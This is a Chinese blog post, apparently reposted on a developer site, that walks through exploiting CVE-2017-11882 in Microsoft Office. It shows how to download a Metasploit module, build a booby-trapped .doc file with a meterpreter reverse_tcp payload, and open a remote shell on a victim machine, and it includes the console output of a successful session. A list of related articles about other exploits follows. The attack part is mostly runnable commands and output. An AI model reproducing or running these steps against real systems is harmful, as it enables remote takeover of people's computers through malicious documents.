cve-2017-11882漏洞利用

最新推荐文章于 2020-04-22 11:31:14 发布
最新推荐文章于 2020-04-22 11:31:14 发布
阅读量252 收藏
点赞数 1
文章标签: 操作系统 网络
原文链接:https://yq.aliyun.com/articles/392330
版权

概述

这是一个潜伏了17年之久的远程代码执行漏洞,这个漏洞影响了目前所有的流行office软件,原理是利用了office的一个EQNEDT32.EXE组件,就是公式编辑器组件,详细的你可以看freebuf的这篇文章
打开文档变肉鸡:潜伏17年的“噩梦公式”Office漏洞攻击分析
我们现在说攻击

操作

首先下载metasploit的攻击模块
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
之后移动到下面这个目录
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
接着启动metasploit
输入
use exploit/windows/fileformat/office_ms17_11882

接着看一下设置选项

msf exploit(office_ms17_11882) > show options

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   yes       Filename to save as
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

设置生成的文件名字
set filename bboysoul.doc
设置主机ip
set lhost 192.168.1.102
开始攻击
exploit

msf exploit(office_ms17_11882) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Using URL: http://0.0.0.0:8080/xudLp3
[*] Local IP: http://192.168.1.102:8080/xudLp3
[*] Server started.

之后当前目录下会生成一个叫bboysoul.doc的文件,我们在受害者机器下打开就好
注意我使用的是office201064位专业版,机器是windows764位
经过测试32位的windows和office是不能用的
接着在受害者机器打开这个文件就好了

msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113
msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Stage two requested, sending...
msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500

msf exploit(office_ms17_11882) > sessions

Active sessions
===============

  Id  Type                     Information                                 Connection
  --  ----                     -----------                                 ----------
  1   meterpreter x64/windows  WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B  192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)

欢迎关注Bboysoul的博客www.bboysoul.com
Have Fun

weixin_34112030
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell
weixin_32139875的博客
01-16 456
两个代码分别贴上[Python] 纯文本查看 复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...
CVE-2017-11882 利用
周公子的博客
01-01 2917
这个漏洞出来很久了,据说通杀以下版本的Office:MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016Microsoft
CVE-2017-11882利用
anan2175的博客
05-08 170
CVE-2017-11882是微软公布的远程执行漏洞,通杀所有office版本及Windows操作系统 工具使用 本文使用的EXP来源于unamer/CVE-2017-11882,然后结合MSF进行渗透 内网一台Windows主机,要求安装Office 外网一台Linux主机,要求安装了MSF,并且该主机拥有一个独立的公网IP(阿里云的主机虽然有公网IP,但是本身是处于内网的,在测试...
Office CVE-2017-11882本地复现
Jun_ay的博客
11-22 3888
Office CVE-2017-11882本地复现 这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今年office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。 下面,我也来蹭波热度。Step1:万年计算器POCPOC GitHub:可以使用国外出现的第一份poc:https
MSF渗透测试-CVE-2017-11882(MSOffice漏洞)
weixin_30652491的博客
04-18 380
1.测试环境 2.测试前准备 3.测试过程 —3.1虚拟机环境测试 —3.2局域网靶机测试 4.测试感想 1.测试环境 攻击机: OS:kail IP:192.168.15.132/192.168.137.231 靶机: OS:Windows7 Office版本:Office2013_CN IP: 2.测试前准备 1.下载python脚本 2.下载MSF组件 3.将cve_2017_...
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞(CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
cve-2017-11882漏洞分析资料.zip
02-17
CVE-2017-11882漏洞分析:深入理解OLE技术与安全》 CVE-2017-11882是一个针对Microsoft Office的严重远程代码执行漏洞,它涉及到对象链接和嵌入(OLE)技术。OLE是Windows操作系统中的一种功能,允许不同应用程序...
FileFormat 文件格式详解
10-10
各种文件的格式详解 包括.fli.flt.mpeg.pic.YUV.zip.reg.inf.bmp.dxf等等
[漏洞样本分析]CVE-2017-11882
r250414958的博客
11-01 3389
环境: Win7(专业版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC来源: https://github.com/embedi/CVE-2017-11882 漏洞介绍: 安全公司Embedi最早报告了漏洞,他们在一个老旧的微软工具Equation Editor中的EQNEDT32...
off CVE-2017-11882漏洞复现
weixin_44664530的博客
04-22 330
CVE-2017-11882漏洞影响版本 office 2003 office 2007 office 2010 office 2013 office 2016 复现环境 win7 kali office 2016 office2016分享链接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A 提取码:d1lo 下载组件 下载 https://gith...
CVE-2017-11882漏洞利用
qq_38111876的博客
09-03 627
转载至:https://www.cnblogs.com/Oran9e/p/7880832.html CVE-2017-11882漏洞利用 CVE-2017-11882漏洞利用 最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大。在此简单说下这个漏洞的复现和利用过程。 ...
[译]使用Kerberos Exploitation Kit攻击MS14-068漏洞
iteye_16188的博客
12-14 418
原文地址:http://adsecurity.org/?p=676 Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击 本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC [color=blue][b]开始攻击[/b][/col...
MS14-068 | Kerberos 中的漏洞可能允许特权提升
收集盒 Book box
11-29 1383
微软已于2014年11月19日发布补丁MS14-068(严重),该补丁修复了Windows Kerberos允许特权提升的漏洞(CVE-2014-6324),详情如下,请大家关注。    已确认被成功利用的软件及系统:    Windows Server 2003  Windows Vista  Windows Server 2008  Windows 7  Windows Ser
ms14-068域提权
zz_strive_2012的专栏
06-17 2455
一、利用mimakatz.exe来抓取域用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。域用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
MS14-068
xiaoxuetu_的博客
07-29 908
危害: 允许攻击者将非特权的域用户帐户权限提升为域管理员帐户的权限。 MS14-068漏洞利用过程: 请求没有PAC作为标准用户的Kerberos TGT身份验证凭证,DC使用TGT进行回复(没有PAC通常包含组成员资格,这是不寻常的)。生成伪造的PAC,没有密钥,所以生成的PAC使用域用户的密码数据使用MD5算法而不是HMAC_MD5“签名”。将无PAC的TGT发送到DC,将伪
CVE-2017-5638漏洞利用
最新发布
10-08
漏洞利用了Apache Struts框架中的一个问题,攻击者可以通过精心构造的恶意输入来执行任意代码,从而实现远程代码执行。 攻击者可以利用该漏洞通过发送恶意的HTTP请求来执行任意代码。当受影响的应用程序使用了受...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值